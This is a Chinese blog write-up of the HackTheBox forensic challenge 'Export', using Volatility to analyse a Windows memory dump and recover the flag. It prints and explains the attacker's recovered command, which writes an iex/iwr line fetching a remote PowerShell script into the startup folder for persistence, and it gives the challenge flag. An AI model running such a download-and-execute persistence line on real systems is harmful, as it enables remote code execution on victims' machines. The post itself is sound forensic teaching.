HackTheBox-Forensic—Export #Windows #Volatility

已于 2023-12-17 16:22:19 修改
阅读量34 收藏
点赞数
文章标签: 安全
于 2023-12-05 22:02:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39974634/article/details/134817707
版权

zip里给了一个文件

WIN-LQPKRCS8Q5M-20201004-145724.raw

这是事件发生时受感染计算机的内存capture

可以用binwalk查看信息

列表很长,从信息中可以得知这是一个Windows memory dump

但是不知道Windows具体版本,可以通过Volatility的imageinfo工具来枚举可能的版本和配置文件

Volatility 是一个开源的内存取证工具,可以用于分析 Windows、Linux 和 Mac 系统的内存转储文件。

先尝试pslist列出目标系统中的进程列表

#指定配置为Win7SP1x64, 使用Volatility 的插件pslist来列出目标系统中的进程列表
python2 /opt/volatility/vol.py -f WIN-LQPKRCS8Q5M-20201004-145724.raw --profile=Win7SP1x64 pslist

插件还有notepad(pslist中与notepad有关的内容)  cmdscan等

插件cmdscan可以提取目标系统内存中的console history

python2 /opt/volatility/vol.py -f WIN-LQPKRCS8Q5M-20201004-145724.raw --profile=Win7SP1x64 cmdscan

从运行结果中可以看到

cmdscan把一串url写到了startup目录下的3usy13fv.ps1文件中

echo iex (iwr "http://xxxx/test.ps1") >c:\user\appdata\startup/3usy12fv.ps1

iex: 这是 PowerShell 中的一个内置命令(别名),全称为 Invoke-Expression。它的作用是执行一个包含 PowerShell 语句的字符串。

(iwr "http://xxxx/test.ps1"): 这是一个嵌套的命令,使用了 PowerShell 的另一个内置命令 Invoke-WebRequest(简写为 iwr)。该命令从指定的 URL 下载一个名为 test.ps1 的 PowerShell 脚本。

这个命令的作用是从指定的 URL 下载一个 PowerShell 脚本,然后将其内容保存到指定的位置。如果在用户的启动目录下创建了一个这样的脚本,那么每次用户登录时,该脚本都将自动执行。

FLAG

可以看到解码的flag

HTB{W1Nd0ws_f0r3Ns1CS_3H?}

行者孙Sun
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
EnCase-Forensic取证软件完整版资料.ppt
11-14
EnCase-Forensic取证软件完整版资料 EnCase Forensic是Guidance Software公司开发的一款计算机取证软件,旨在提供计算机犯罪取证的全面解决方案。该软件提供实时预览、分析和获取,符合美国立法规范,全球最大的...
Windows Forensic Analysis Including DVD Toolkit.pdf
08-21
that discuss the anti-forensic technique of using the forensic analysts’training and tools against them.This book is intended to address the need for a more detailed,granular level of understanding....
HackTheBox-Forensic-Insider #Browser #Mozilla
weixin_39974634的博客
12-05 22
给了一个压缩包,解压出来除了Firefox以外没有内容 将在这个文件夹中查找攻击者访问的内容,这个文件夹包含了火狐浏览器需要的设置和一些信息 为了排除干扰信息,建议在系统上新建一个账户,把该文件夹复制到c:\user\xxx\appdata\local\mozilla 我们启动火狐浏览器,就会自动读取目录下profile的信息 访问历史显示了攻击者登录了acc01的8080端口,可以看到攻击者访问了 password字段显示了flag
HackTheBox-Forensic— Illumination #Linux #Git
weixin_39974634的博客
12-05 131
从config变量可以看到,从config.json读取了文件,解析token后进行login操作。根据注释可见token已经被替换,因为不是base64,无法在开发/生产中正常工作。首先通过ls -la找到 .git 发现这是一个git repository。通过git show 加commit id可以看到变更记录。由于这是git库,可以通过过去的日志查看被替换之前的值。查看config.json文件。
HackTheBox-Forensic—Extraterrestrial Persistence #Linux
weixin_39974634的博客
12-05 29
WantedBy=multi-user.target #在multi-user.target启动时自动启动。[]是systemd的语法规定,用于规定节的开始和结束 一般都会有 关于服务的一般性描述和依赖关系。ExecStart=/usr/local/bin/service #服务开始时执行的命令。ExecStop=/usr/local/bin/service #服务停止时执行的命令。[Install] #定义服务与系统目标之间的关联以及启用或禁用服务时的行为。丢到hiencode解码。
HackTheBox-Forensic— Red Miners #Linux
weixin_39974634的博客
12-05 38
cronCleanUp 删除原有的计划任务,contab -l 可以列举 用sed去掉之后 crontab编辑 将修改内容保存。cleanEnv这个函数把环境中阻碍挖矿的进程杀掉,还会检查其他挖矿的行为,如果有的话也会杀掉。flag的四个部分通过搜索 == 或者"base64 -d"可以找到,经过拼接,得到最后的结果。给了一个miner.zip里面是一个installer_miner.sh的挖矿文件。
HackTheBox-Forensic-Peel Back The Layers #Linux
weixin_39974634的博客
12-06 21
在 Dockerfile 中使用 RUN rm 或类似命令删除了一个文件时,该文件实际上并没有从镜像中物理删除。它只是在一个新的层中被标记为已删除,并且上一层中的文件保持不变。这些文件仍然可以在后续的层中找到,因为它们是在上一层中存在的。我们通过 docker save 生成的 tar 文件会包含所有层,包括那些dockerfile删除了文件的层。docker history 命令同样可以查看 Docker 镜像的构建历史,包括每一层镜像创建的时间、作者、大小变化以及使用的命令等信息。
HackTheBox Forensic Reflection #Windows(更新中)test
weixin_39974634的博客
12-18 30
输出结果表示在内存中的某个地址(0x000000003f4551c0)找到了一个名为"update.ps1"的文件,其大小为8字节,权限为只读(R--r--),路径为"\Device\HarddiskVolume1\Windows\security"。-PEUrl https://windowsliveupdater.com/winmgr.dll 指定了要下载和执行的 DLL 文件的 URL('https://windowsliveupdater.com/winmgr.dll')。
HackTheBox Forensic Reflection #Windows(更新中)
weixin_39974634的博客
12-19 300
在这个例子中,下载的是一个名为 "sysdriver.ps1" 的 PowerShell 脚本。输出结果表示在内存中的某个地址(0x000000003f4551c0)找到了一个名为"update.ps1"的文件,其大小为8字节,权限为只读(R--r--),路径为"\Device\HarddiskVolume1\Windows\security"。例如,".text" 节通常包含可执行代码,".data" 节包含初始化的数据,".rdata" 节包含只读数据等。这些导入和导出的信息都会在特定的表中记录。
【Hack The Boxwindows练习-- Blackfield
人间体佐菲的博客
11-17 406
【Hack The Boxwindows练习-- Blackfield
探索隐秘信息世界的宝藏:Awesome-anti-forensic 开源项目
gitblog_00023的博客
05-20 389
探索隐秘信息世界的宝藏:Awesome-anti-forensic 开源项目 项目地址:https://gitcode.com/shadawck/awesome-anti-forensic 在数字世界中,数据安全和隐私保护至关重要,而反取证工具是确保这些信息安全的关键一环。【Awesome-anti-forensic】是一个精心整理的开源项目集合,它聚合了一系列用于对抗数字取证活动的工具和技术,涵...
Ubuntu-Forensic_linux_
09-30
Ubuntu operating system canconserve and manage a lot of configurationinformation and the information with forensicimportance
开源项目-esimov-forensic.zip
09-03
开源项目-esimov-forensic.zip,Forensic - Image forgery detection library
Cuda-OpenCL-Forensic-Tools:使用图形卡进行取证处理
05-10
Cuda / OpenCL取证工具使用图形卡进行取证处理。 开发脚本以执行简单的取证功能,例如图像,覆盖,哈希和搜索。 该脚本的核心是Python Cuda / OpenCL。 最初的目标是测试该概念的性能。 如果性能显示出价值,那么下...
等保测评和安全运维
weixin_64392888的博客
06-11 645
通过将等保测评的标准和流程融入日常的安全运维工作中,企业可以更有效地识别和应对网络安全威胁,构建起一个全面、动态的网络安全防护体系。为了应对这些挑战,企业不仅要实施有效的安全运维措施,还需要通过等保测评确保其信息系统符合国家的安全标准。等保测评提供了一套标准化的安全要求,安全运维团队可以根据这些要求,实施相应的安全措施,如加强访问控制、数据加密、网络安全防护等。通过等保测评,企业可以识别信息系统的安全风险,并根据测评结果制定或调整安全策略,确保安全措施与企业的实际需求相匹配。
《软件定义安全》之六:SDN和NFV安全实践
大龄IT民工
06-11 1407
DDoS检测清洗应用ADS APP的设计思路:借助安全控制平台中流相关的组件,从SDN控制器中获得相应的流量,并根据抗DDoS应用订阅的恶意流特征进行检测,发现恶意流量后,应用可根据细粒度的检测判断是否出现恶意攻击。如是,则下发实时清洗的流指令,即可将恶意流量牵引到清洗设备ADS上。过程如下:➊注册。启动阶段,ADS设备和ADS APP均向安全控制平台注册,提供自己的基本信息,如类型、位置和能力等。➋订阅。为获取并检查可疑流,ADS APP向安全控制器发送订阅。➌流统计获取和检查。
如何确保数据跨域交换安全、合规、可追溯性?
最新发布
文件数据安全交换
06-14 323
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一、安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
展会邀请 | 龙智即将亮相2024上海国际嵌入式展,带来安全合规、单一可信数据源、可追溯、高效协同的嵌入式开发解决方案
weixin_49715102的博客
06-09 960
凭借在DevSecOps领域的深厚积累,龙智在全球范围内遴选优秀的专业工具,为嵌入式开发行业打造了专属的嵌入式开发解决方案,并提供专业咨询、方案定制、实施部署、专业培训、定制开发等一站式服务支持。等全球专业工具,覆盖嵌入式软件单元测试、静态代码分析、需求管理、版本控制、生命周期管理及项目管理、知识库管理等领域,助力企业实现安全合规、可追溯、单一可信数据源、高效协同的嵌入式开发。并且嵌入式系统往往非常复杂,需要全面的测试覆盖、高效的测试执行,才能确保系统的可靠性和正确性,以及产品的及时交付。
Oxygen Forensic
07-28
Oxygen Forensic是一个用于手机上的取证套件,用于收集设备的各种信息,包括制造商、操作系统、IMEI号码、序列号等。它还可以收集联系人、消息(电子邮件、短信、彩信)、已删除的消息、通话记录和日历信息。\[1\]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值